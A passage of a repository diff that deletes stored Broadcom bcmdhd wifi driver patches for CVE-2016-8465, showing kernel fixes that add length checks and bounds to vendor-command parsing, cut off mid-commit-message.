-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9hbmRyb2lkLmMgYi9kcml2ZXJzL25ldC93aXJlbGVzcy9iY21kaGQvd2xfYW5kcm9pZC5jCmluZGV4IDI0YjcxYzUuLjBkYjY5ZWYgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9hbmRyb2lkLmMKKysrIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2FuZHJvaWQuYwpAQCAtMjQ2LDExICsyNDYsMTggQEAKIAkJcmV0dXJuIC0xOwogCWlmICgoc3NpZC5TU0lEX2xlbiA9PSAwKSB8fCAoc3NpZC5TU0lEX2xlbiA+IERPVDExX01BWF9TU0lEX0xFTikpIHsKIAkJREhEX0VSUk9SKCgiJXM6IHdsZGV2X2dldF9zc2lkIGZhaWxlZFxuIiwgX19GVU5DVElPTl9fKSk7CisJfSBlbHNlIGlmICh0b3RhbF9sZW4gPD0gc3NpZC5TU0lEX2xlbikgeworCQlyZXR1cm4gLUVOT01FTTsKIAl9IGVsc2UgewogCQltZW1jcHkoY29tbWFuZCwgc3NpZC5TU0lELCBzc2lkLlNTSURfbGVuKTsKIAkJYnl0ZXNfd3JpdHRlbiA9IHNzaWQuU1NJRF9sZW47CiAJfQotCWJ5dGVzX3dyaXR0ZW4gKz0gc25wcmludGYoJmNvbW1hbmRbYnl0ZXNfd3JpdHRlbl0sIHRvdGFsX2xlbiwgIiByc3NpICVkIiwgcnNzaSk7CisJaWYgKCh0b3RhbF9sZW4gLSBieXRlc193cml0dGVuKSA8IChzdHJsZW4oIiByc3NpIC1YWFgiKSArIDEpKQorCQlyZXR1cm4gLUVOT01FTTsKKwlieXRlc193cml0dGVuICs9IHNjbnByaW50ZigmY29tbWFuZFtieXRlc193cml0dGVuXSwKKwkJdG90YWxfbGVuIC0gYnl0ZXNfd3JpdHRlbiwgIiByc3NpICVkIiwgcnNzaSk7CisJY29tbWFuZFtieXRlc193cml0dGVuXSA9ICdcMCc7CisKIAlESERfSU5GTygoIiVzOiBjb21tYW5kIHJlc3VsdCBpcyAlcyAoJWQpXG4iLCBfX0ZVTkNUSU9OX18sIGNvbW1hbmQsIGJ5dGVzX3dyaXR0ZW4pKTsKIAlyZXR1cm4gYnl0ZXNfd3JpdHRlbjsKIH0KQEAgLTEyODQsMTAgKzEyOTEsMTMgQEAKIGludCB3bF9hbmRyb2lkX3ByaXZfY21kKHN0cnVjdCBuZXRfZGV2aWNlICpuZXQsIHN0cnVjdCBpZnJlcSAqaWZyLCBpbnQgY21kKQogewogI2RlZmluZSBQUklWQVRFX0NPTU1BTkRfTUFYX0xFTgk4MTkyCisjZGVmaW5lIFBSSVZBVEVfQ09NTUFORF9ERUZfTEVOCTQwOTYKKwogCWludCByZXQgPSAwOwogCWNoYXIgKmNvbW1hbmQgPSBOVUxMOwogCWludCBieXRlc193cml0dGVuID0gMDsKIAlhbmRyb2lkX3dpZmlfcHJpdl9jbWQgcHJpdl9jbWQ7CisJaW50IGJ1Zl9zaXplID0gMDsKIAogCW5ldF9vc193YWtlX2xvY2sobmV0KTsKIApAQCAtMTMyMSwxMiArMTMzMSwxNyBAQAogCQkJZ290byBleGl0OwogCQl9CiAJfQorCiAJaWYgKChwcml2X2NtZC50b3RhbF9sZW4gPiBQUklWQVRFX0NPTU1BTkRfTUFYX0xFTikgfHwgKHByaXZfY21kLnRvdGFsX2xlbiA8IDApKSB7Ci0JCURIRF9FUlJPUigoIiVzOiB0b28gbG9uZyBwcmlhdnRlIGNvbW1hbmRcbiIsIF9fRlVOQ1RJT05fXykpOworCQlESERfRVJST1IoKCIlczogYnVmIGxlbmd0aCBpbnZhbGlkOiVkXG4iLCBfX0ZVTkNUSU9OX18sCisJCQkgICBwcml2X2NtZC50b3RhbF9sZW4pKTsKIAkJcmV0ID0gLUVJTlZBTDsKIAkJZ290byBleGl0OwogCX0KLQljb21tYW5kID0ga21hbGxvYygocHJpdl9jbWQudG90YWxfbGVuICsgMSksIEdGUF9LRVJORUwpOworCisJYnVmX3NpemUgPSBtYXgocHJpdl9jbWQudG90YWxfbGVuLCBQUklWQVRFX0NPTU1BTkRfREVGX0xFTik7CisJY29tbWFuZCA9IGttYWxsb2MoKGJ1Zl9zaXplICsgMSksIEdGUF9LRVJORUwpOworCiAJaWYgKCFjb21tYW5kKQogCXsKIAkJREhEX0VSUk9SKCgiJXM6IGZhaWxlZCB0byBhbGxvY2F0ZSBtZW1vcnlcbiIsIF9fRlVOQ1RJT05fXykpOwpAQCAtMTM0MSw2ICsxMzU2LDQxIEBACiAKIAlESERfSU5GTygoIiVzOiBBbmRyb2lkIHByaXZhdGUgY21kIFwiJXNcIiBvbiAlc1xuIiwgX19GVU5DVElPTl9fLCBjb21tYW5kLCBpZnItPmlmcl9uYW1lKSk7CiAKKwlieXRlc193cml0dGVuID0gd2xfaGFuZGxlX3ByaXZhdGVfY21kKG5ldCwgY29tbWFuZCwgcHJpdl9jbWQudG90YWxfbGVuKTsKKwlpZiAoYnl0ZXNfd3JpdHRlbiA+PSAwKSB7CisJCWlmICgoYnl0ZXNfd3JpdHRlbiA9PSAwKSAmJiAocHJpdl9jbWQudG90YWxfbGVuID4gMCkpCisJCQljb21tYW5kWzBdID0gJ1wwJzsKKwkJaWYgKGJ5dGVzX3dyaXR0ZW4gPj0gcHJpdl9jbWQudG90YWxfbGVuKSB7CisJCQlESERfRVJST1IoKCIlczogZXJyLiBiX3c6JWQgPj0gdG90OiVkXG4iLCBfX0ZVTkNUSU9OX18sCisJCQkJICAgYnl0ZXNfd3JpdHRlbiwgcHJpdl9jbWQudG90YWxfbGVuKSk7CisJCQlyZXQgPSBCQ01FX0JVRlRPT1NIT1JUOworCQkJZ290byBleGl0OworCQl9CisJCWJ5dGVzX3dyaXR0ZW4rKzsKKwkJcHJpdl9jbWQudXNlZF9sZW4gPSBieXRlc193cml0dGVuOworCQlpZiAoY29weV90b191c2VyKHByaXZfY21kLmJ1ZiwgY29tbWFuZCwgYnl0ZXNfd3JpdHRlbikpIHsKKwkJCURIRF9FUlJPUigoIiVzOiBmYWlsZWQgY29weSB0byB1c2VyXG4iLCBfX0ZVTkNUSU9OX18pKTsKKwkJCXJldCA9IC1FRkFVTFQ7CisJCX0KKwl9IGVsc2UgeworCQlyZXQgPSBieXRlc193cml0dGVuOworCX0KKworZXhpdDoKKwluZXRfb3Nfd2FrZV91bmxvY2sobmV0KTsKKwlrZnJlZShjb21tYW5kKTsKKwlyZXR1cm4gcmV0OworfQorCitpbnQKK3dsX2hhbmRsZV9wcml2YXRlX2NtZChzdHJ1Y3QgbmV0X2RldmljZSAqbmV0LCBjaGFyICpjb21tYW5kLCB1MzIgYnVmX3NpemUpCit7CisJaW50IGJ5dGVzX3dyaXR0ZW4gPSAwOworCWFuZHJvaWRfd2lmaV9wcml2X2NtZCBwcml2X2NtZDsKKworCWJ6ZXJvKCZwcml2X2NtZCwgc2l6ZW9mKGFuZHJvaWRfd2lmaV9wcml2X2NtZCkpOworCXByaXZfY21kLnRvdGFsX2xlbiA9IGJ1Zl9zaXplOworCiAJaWYgKHN0cm5pY21wKGNvbW1hbmQsIENNRF9TVEFSVCwgc3RybGVuKENNRF9TVEFSVCkpID09IDApIHsKIAkJREhEX0lORk8oKCIlcywgUmVjZWl2ZWQgcmVndWxhciBTVEFSVCBjb21tYW5kXG4iLCBfX0ZVTkNUSU9OX18pKTsKIAkJYnl0ZXNfd3JpdHRlbiA9IHdsX2FuZHJvaWRfd2lmaV9vbihuZXQpOwpAQCAtMTM1MCwxMCArMTQwMCw5IEBACiAJfQogCiAJaWYgKCFnX3dpZmlfb24pIHsKLQkJREhEX0VSUk9SKCgiJXM6IElnbm9yZSBwcml2YXRlIGNtZCBcIiVzXCIgLSBpZmFjZSAlcyBpcyBkb3duXG4iLAotCQkJX19GVU5DVElPTl9fLCBjb21tYW5kLCBpZnItPmlmcl9uYW1lKSk7Ci0JCXJldCA9IDA7Ci0JCWdvdG8gZXhpdDsKKwkJREhEX0VSUk9SKCgiJXM6IElnbm9yZSBwcml2YXRlIGNtZCBcIiVzXCIgLSBpZmFjZSBpcyBkb3duXG4iLAorCQkJICAgX19GVU5DVElPTl9fLCBjb21tYW5kKSk7CisJCXJldHVybiAwOwogCX0KIAogCWlmIChzdHJuaWNtcChjb21tYW5kLCBDTURfU1RPUCwgc3RybGVuKENNRF9TVE9QKSkgPT0gMCkgewpAQCAtMTUxMSwzNiArMTU2MCwxMCBAQAogCX0KIAllbHNlIHsKIAkJREhEX0VSUk9SKCgiVW5rbm93biBQUklWQVRFIGNvbW1hbmQgJXMgLSBpZ25vcmVkXG4iLCBjb21tYW5kKSk7Ci0JCXNucHJpbnRmKGNvbW1hbmQsIDMsICJPSyIpOwotCQlieXRlc193cml0dGVuID0gc3RybGVuKCJPSyIpOworCQlieXRlc193cml0dGVuID0gc2NucHJpbnRmKGNvbW1hbmQsIHNpemVvZigiRkFJTCIpLCAiRkFJTCIpOwogCX0KIAotCWlmIChieXRlc193cml0dGVuID49IDApIHsKLQkJaWYgKChieXRlc193cml0dGVuID09IDApICYmIChwcml2X2NtZC50b3RhbF9sZW4gPiAwKSkKLQkJCWNvbW1hbmRbMF0gPSAnXDAnOwotCQlpZiAoYnl0ZXNfd3JpdHRlbiA+PSBwcml2X2NtZC50b3RhbF9sZW4pIHsKLQkJCURIRF9FUlJPUigoIiVzOiBieXRlc193cml0dGVuID0gJWRcbiIsIF9fRlVOQ1RJT05fXywgYnl0ZXNfd3JpdHRlbikpOwotCQkJYnl0ZXNfd3JpdHRlbiA9IHByaXZfY21kLnRvdGFsX2xlbjsKLQkJfSBlbHNlIHsKLQkJCWJ5dGVzX3dyaXR0ZW4rKzsKLQkJfQotCQlwcml2X2NtZC51c2VkX2xlbiA9IGJ5dGVzX3dyaXR0ZW47Ci0JCWlmIChjb3B5X3RvX3VzZXIocHJpdl9jbWQuYnVmLCBjb21tYW5kLCBieXRlc193cml0dGVuKSkgewotCQkJREhEX0VSUk9SKCgiJXM6IGZhaWxlZCB0byBjb3B5IGRhdGEgdG8gdXNlciBidWZmZXJcbiIsIF9fRlVOQ1RJT05fXykpOwotCQkJcmV0ID0gLUVGQVVMVDsKLQkJfQotCX0KLQllbHNlIHsKLQkJcmV0ID0gYnl0ZXNfd3JpdHRlbjsKLQl9Ci0KLWV4aXQ6Ci0JbmV0X29zX3dha2VfdW5sb2NrKG5ldCk7Ci0JaWYgKGNvbW1hbmQpIHsKLQkJa2ZyZWUoY29tbWFuZCk7Ci0JfQotCi0JcmV0dXJuIHJldDsKKwlyZXR1cm4gYnl0ZXNfd3JpdHRlbjsKIH0KIAogaW50IHdsX2FuZHJvaWRfaW5pdCh2b2lkKQpkaWZmIC0tZ2l0IGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2FuZHJvaWQuaCBiL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9hbmRyb2lkLmgKaW5kZXggMjgyNzEzMi4uZjYyYjY0NiAxMDA2NDQKLS0tIGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2FuZHJvaWQuaAorKysgYi9kcml2ZXJzL25ldC93aXJlbGVzcy9iY21kaGQvd2xfYW5kcm9pZC5oCkBAIC01Myw2ICs1Myw3IEBACiBpbnQgd2xfYW5kcm9pZF93aWZpX29uKHN0cnVjdCBuZXRfZGV2aWNlICpkZXYpOwogaW50IHdsX2FuZHJvaWRfd2lmaV9vZmYoc3RydWN0IG5ldF9kZXZpY2UgKmRldiwgYm9vbCBvbl9mYWlsdXJlKTsKIGludCB3bF9hbmRyb2lkX3ByaXZfY21kKHN0cnVjdCBuZXRfZGV2aWNlICpuZXQsIHN0cnVjdCBpZnJlcSAqaWZyLCBpbnQgY21kKTsKK2ludCB3bF9oYW5kbGVfcHJpdmF0ZV9jbWQoc3RydWN0IG5ldF9kZXZpY2UgKm5ldCwgY2hhciAqY29tbWFuZCwgdTMyIGNtZF9sZW4pOwogCiAKIC8qIGhvc3RhcCBtYWMgbW9kZSAqLwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.10/0001.patch
deleted file mode 100644
index f39a5bf9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0001.patch
+++ /dev/null
@@ -1,155 +0,0 @@
-From 8f1621cd0d0ca0bc494a926a1331f582b27b913e Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Thu, 3 Nov 2016 10:53:51 -0700
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in
- wl_cfgvendor_hotlist_cfg
-
-fix buffer overrun found where user manipulated input parameters
-
-1. allocate local buffer with max length than input sized.
-2. length check added in each tlv parsing and added error handling.
-3. limit max hotlist count to PFN_SW_MAX_NUM_APS(16).
-
-bug=32474971
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: I60d513a30875f6a8ee8cfdc557bdec1436416fe7
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 107 +++++++++++++++++++++--------
- 1 file changed, 78 insertions(+), 29 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index eb83c8339e471..d578026885619 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -691,14 +691,22 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 	struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
- 	gscan_hotlist_scan_params_t *hotlist_params;
- 	int tmp, tmp1, tmp2, type, j = 0, dummy;
--	const struct nlattr *outer, *inner, *iter;
--	bool flush = FALSE;
-+	const struct nlattr *outer, *inner = NULL, *iter;
-+	uint8 flush = 0;
- 	struct bssid_t *pbssid;
- 
--	hotlist_params = (gscan_hotlist_scan_params_t *)kzalloc(len, GFP_KERNEL);
-+	if (len < sizeof(*hotlist_params) || len >= WLC_IOCTL_MAXLEN) {
-+		WL_ERR(("buffer length :%d wrong - bail out.\n", len));
-+		return -EINVAL;
-+	}
-+
-+	hotlist_params = kzalloc(sizeof(*hotlist_params)
-+		+ (sizeof(struct bssid_t) * (PFN_SWC_MAX_NUM_APS - 1)),
-+		GFP_KERNEL);
-+
- 	if (!hotlist_params) {
- 		WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
--		return -1;
-+		return -ENOMEM;
- 	}
- 
- 	hotlist_params->lost_ap_window = GSCAN_LOST_AP_WINDOW_DEFAULT;
-@@ -706,37 +714,78 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 	nla_for_each_attr(iter, data, len, tmp2) {
- 		type = nla_type(iter);
- 		switch (type) {
--			case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
--				pbssid = hotlist_params->bssid;
--				nla_for_each_nested(outer, iter, tmp) {
--					nla_for_each_nested(inner, outer, tmp1) {
--						type = nla_type(inner);
-+		case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+			pbssid = hotlist_params->bssid;
-+			nla_for_each_nested(outer, iter, tmp) {
-+				nla_for_each_nested(inner, outer, tmp1) {
-+					type = nla_type(inner);
- 
--						switch (type) {
--							case GSCAN_ATTRIBUTE_BSSID:
--								memcpy(&(pbssid[j].macaddr),
--								  nla_data(inner), ETHER_ADDR_LEN);
--								break;
--							case GSCAN_ATTRIBUTE_RSSI_LOW:
--								pbssid[j].rssi_reporting_threshold =
--								         (int8) nla_get_u8(inner);
--								break;
--							case GSCAN_ATTRIBUTE_RSSI_HIGH:
--								dummy = (int8) nla_get_u8(inner);
--								break;
-+					switch (type) {
-+					case GSCAN_ATTRIBUTE_BSSID:
-+						if (nla_len(inner) != sizeof(pbssid[j].macaddr)) {
-+							WL_DBG(("type:%d length:%d not matching.\n",
-+								type, nla_len(inner)));
-+							err = -EINVAL;
-+							goto exit;
- 						}
-+						memcpy(
-+							&pbssid[j].macaddr,
-+							nla_data(inner),
-+							sizeof(pbssid[j].macaddr));
-+						break;
-+					case GSCAN_ATTRIBUTE_RSSI_LOW:
-+						if (nla_len(inner) != sizeof(uint8)) {
-+							WL_DBG(("type:%d length:%d not matching.\n",
-+								type, nla_len(inner)));
-+							err = -EINVAL;
-+							goto exit;
-+						}
-+						pbssid[j].rssi_reporting_threshold =
-+								(int8)nla_get_u8(inner);
-+						break;
-+					case GSCAN_ATTRIBUTE_RSSI_HIGH:
-+						if (nla_len(inner) != sizeof(uint8)) {
-+							WL_DBG(("type:%d length:%d not matching.\n",
-+								type, nla_len(inner)));
-+							err = -EINVAL;
-+							goto exit;
-+						}
-+						dummy = (int8)nla_get_u8(inner);
-+						break;
- 					}
--					j++;
-+				}
-+				if (++j > PFN_SWC_MAX_NUM_APS) {
-+					WL_DBG(("nbssid:%d exeed limit.\n",
-+						hotlist_params->nbssid));
-+					err = -EINVAL;
-+					goto exit;
- 				}
- 				hotlist_params->nbssid = j;
--				break;
--			case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
--				flush = (bool) nla_get_u8(iter);
--				break;
--			case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
--				hotlist_params->lost_ap_window = nla_get_u32(iter);
--				break;
- 			}
-+			break;
-+		case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-+			if (nla_len(iter) != sizeof(uint8)) {
-+				WL_DBG(("type:%d length:%d not matching.\n",
-+					type, nla_len(inner)));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			flush = nla_get_u8(iter);
-+			break;
-+		case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
-+			if (nla_len(iter) != sizeof(uint32)) {
-+				WL_DBG(("type:%d length:%d not matching.\n",
-+					type, nla_len(inner)));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			hotlist_params->lost_ap_window = (uint16)nla_get_u32(iter);
-+			break;
-+		default:
-+			WL_DBG(("Unknown type %d\n", type));
-+			err = -EINVAL;
-+			goto exit;
-+		}
- 
- 	}
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.10/0002.patch
deleted file mode 100644
index 23145edd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0002.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 50ba575e9cd28ab9537f0961bbc051a6a727da74 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Wed, 30 Nov 2016 12:00:17 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix hotlist index in
- wl_cfgvendor_hotlist_cfg
-
-add bssid count element to exactly refer in NL-TLV parsing.
-
-This change need to sync with
-/hardware/broadcom/wlan/bcmdhd/wifi_hal/gscan.cpp
-where GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT supposed to be called.
-
-Bug: 32474971
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Id2b019bb43fb99b3843fe1b32f59e58c7af7cdad
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 39 ++++++++++++++++++++++++------
- drivers/net/wireless/bcmdhd/wl_cfgvendor.h |  1 +
- 2 files changed, 32 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index b156660ed053a..9a73de20f1298 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -705,7 +705,7 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 		GFP_KERNEL);
- 
- 	if (!hotlist_params) {
--		WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
-+		WL_ERR(("Cannot Malloc mem.\n"));
- 		return -ENOMEM;
- 	}
- 
-@@ -714,10 +714,33 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 	nla_for_each_attr(iter, data, len, tmp2) {
- 		type = nla_type(iter);
- 		switch (type) {
-+		case GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT:
-+			if (nla_len(iter) != sizeof(uint32)) {
-+				WL_DBG(("type:%d length:%d not matching.\n",
-+					type, nla_len(inner)));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			hotlist_params->nbssid = (uint16)nla_get_u32(iter);
-+			if ((hotlist_params->nbssid == 0) ||
-+			    (hotlist_params->nbssid > PFN_SWC_MAX_NUM_APS)) {
-+				WL_ERR(("nbssid:%d exceed limit.\n",
-+					hotlist_params->nbssid));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			break;
- 		case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+			if (hotlist_params->nbssid == 0) {
-+				WL_ERR(("nbssid not retrieved.\n"));
-+				err = -EINVAL;
-+				goto exit;
-+			}
- 			pbssid = hotlist_params->bssid;
- 			nla_for_each_nested(outer, iter, tmp) {
- 				nla_for_each_nested(inner, outer, tmp1) {
-+					if (j >= hotlist_params->nbssid)
-+						break;
- 					type = nla_type(inner);
- 
- 					switch (type) {
-@@ -754,13 +777,13 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 						break;
- 					}
- 				}
--				if (++j > PFN_SWC_MAX_NUM_APS) {
--					WL_DBG(("nbssid:%d exeed limit.\n",
--						hotlist_params->nbssid));
--					err = -EINVAL;
--					goto exit;
--				}
--				hotlist_params->nbssid = j;
-+				j++;
-+			}
-+			if (j != hotlist_params->nbssid) {
-+				WL_ERR(("bssid_cnt:%d != nbssid:%d.\n", j,
-+					hotlist_params->nbssid));
-+				err = -EINVAL;
-+				goto exit;
- 			}
- 			break;
- 		case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-index e6cb53a1de087..e15666f720e50 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-@@ -203,6 +203,7 @@ enum gscan_attributes {
-     GSCAN_ATTRIBUTE_RSSI_HIGH,
-     GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM,
-     GSCAN_ATTRIBUTE_HOTLIST_FLUSH,
-+    GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT,
- 
-     /* remaining reserved for additional attributes */
-     GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60,
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.18/0003.patch
deleted file mode 100644
index 83a9f1f7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0003.patch
+++ /dev/null
@@ -1,156 +0,0 @@
-From 4add5112babf94dbc0f86e93395b6622d5080d16 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Thu, 3 Nov 2016 10:53:51 -0700
-Subject: net: wireless: bcmdhd: fix buffer overrun in wl_cfgvendor_hotlist_cfg
-
-fix buffer overrun found where user manipulated input parameters
-
-1. allocate local buffer with max length than input sized.
-2. length check added in each tlv parsing and added error handling.
-3. limit max hotlist count to PFN_SW_MAX_NUM_APS(16).
-
-bug=32474971
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: I60d513a30875f6a8ee8cfdc557bdec1436416fe7
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 105 +++++++++++++++++++++--------
- 1 file changed, 77 insertions(+), 28 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index aa8f352..037e885 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -615,14 +615,22 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 	struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
- 	gscan_hotlist_scan_params_t *hotlist_params;
- 	int tmp, tmp1, tmp2, type, j = 0, dummy;
--	const struct nlattr *outer, *inner, *iter;
-+	const struct nlattr *outer, *inner = NULL, *iter;
- 	uint8 flush = 0;
- 	struct bssid_t *pbssid;
- 
--	hotlist_params = (gscan_hotlist_scan_params_t *)kzalloc(len, GFP_KERNEL);
-+	if (len < sizeof(*hotlist_params) || len >= WLC_IOCTL_MAXLEN) {
-+		WL_ERR(("buffer length :%d wrong - bail out.\n", len));
-+		return -EINVAL;
-+	}
-+
-+	hotlist_params = kzalloc(sizeof(*hotlist_params)
-+		+ (sizeof(struct bssid_t) * (PFN_SWC_MAX_NUM_APS - 1)),
-+		GFP_KERNEL);
-+
- 	if (!hotlist_params) {
- 		WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
--		return -1;
-+		return -ENOMEM;
- 	}
- 
- 	hotlist_params->lost_ap_window = GSCAN_LOST_AP_WINDOW_DEFAULT;
-@@ -630,37 +638,78 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 	nla_for_each_attr(iter, data, len, tmp2) {
- 		type = nla_type(iter);
- 		switch (type) {
--			case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
--				pbssid = hotlist_params->bssid;
--				nla_for_each_nested(outer, iter, tmp) {
--					nla_for_each_nested(inner, outer, tmp1) {
--						type = nla_type(inner);
-+		case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+			pbssid = hotlist_params->bssid;
-+			nla_for_each_nested(outer, iter, tmp) {
-+				nla_for_each_nested(inner, outer, tmp1) {
-+					type = nla_type(inner);
- 
--						switch (type) {
--							case GSCAN_ATTRIBUTE_BSSID:
--								memcpy(&(pbssid[j].macaddr),
--								  nla_data(inner), ETHER_ADDR_LEN);
--								break;
--							case GSCAN_ATTRIBUTE_RSSI_LOW:
--								pbssid[j].rssi_reporting_threshold =
--								         (int8) nla_get_u8(inner);
--								break;
--							case GSCAN_ATTRIBUTE_RSSI_HIGH:
--								dummy = (int8) nla_get_u8(inner);
--								break;
-+					switch (type) {
-+					case GSCAN_ATTRIBUTE_BSSID:
-+						if (nla_len(inner) != sizeof(pbssid[j].macaddr)) {
-+							WL_DBG(("type:%d length:%d not matching.\n",
-+								type, nla_len(inner)));
-+							err = -EINVAL;
-+							goto exit;
-+						}
-+						memcpy(
-+							&pbssid[j].macaddr,
-+							nla_data(inner),
-+							sizeof(pbssid[j].macaddr));
-+						break;
-+					case GSCAN_ATTRIBUTE_RSSI_LOW:
-+						if (nla_len(inner) != sizeof(uint8)) {
-+							WL_DBG(("type:%d length:%d not matching.\n",
-+								type, nla_len(inner)));
-+							err = -EINVAL;
-+							goto exit;
-+						}
-+						pbssid[j].rssi_reporting_threshold =
-+								(int8)nla_get_u8(inner);
-+						break;
-+					case GSCAN_ATTRIBUTE_RSSI_HIGH:
-+						if (nla_len(inner) != sizeof(uint8)) {
-+							WL_DBG(("type:%d length:%d not matching.\n",
-+								type, nla_len(inner)));
-+							err = -EINVAL;
-+							goto exit;
- 						}
-+						dummy = (int8)nla_get_u8(inner);
-+						break;
- 					}
--					j++;
-+				}
-+				if (++j > PFN_SWC_MAX_NUM_APS) {
-+					WL_DBG(("nbssid:%d exeed limit.\n",
-+						hotlist_params->nbssid));
-+					err = -EINVAL;
-+					goto exit;
- 				}
- 				hotlist_params->nbssid = j;
--				break;
--			case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
--				flush = nla_get_u8(iter);
--				break;
--			case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
--				hotlist_params->lost_ap_window = nla_get_u32(iter);
--				break;
- 			}
-+			break;
-+		case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-+			if (nla_len(iter) != sizeof(uint8)) {
-+				WL_DBG(("type:%d length:%d not matching.\n",
-+					type, nla_len(inner)));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			flush = nla_get_u8(iter);
-+			break;
-+		case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
-+			if (nla_len(iter) != sizeof(uint32)) {
-+				WL_DBG(("type:%d length:%d not matching.\n",
-+					type, nla_len(inner)));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			hotlist_params->lost_ap_window = (uint16)nla_get_u32(iter);
-+			break;
-+		default:
-+			WL_DBG(("Unknown type %d\n", type));
-+			err = -EINVAL;
-+			goto exit;
-+		}
- 
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0004.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.18/0004.patch
deleted file mode 100644
index 6ac0375c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0004.patch
+++ /dev/null
@@ -1,103 +0,0 @@
-From 3619fd91b831f184d2e544e23cb54d20eed2531e Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Wed, 30 Nov 2016 12:00:17 -0800
-Subject: net: wireless: bcmdhd: fix hotlist index in wl_cfgvendor_hotlist_cfg
-
-add bssid count element to exactly refer in NL-TLV parsing.
-
-This change need to sync with
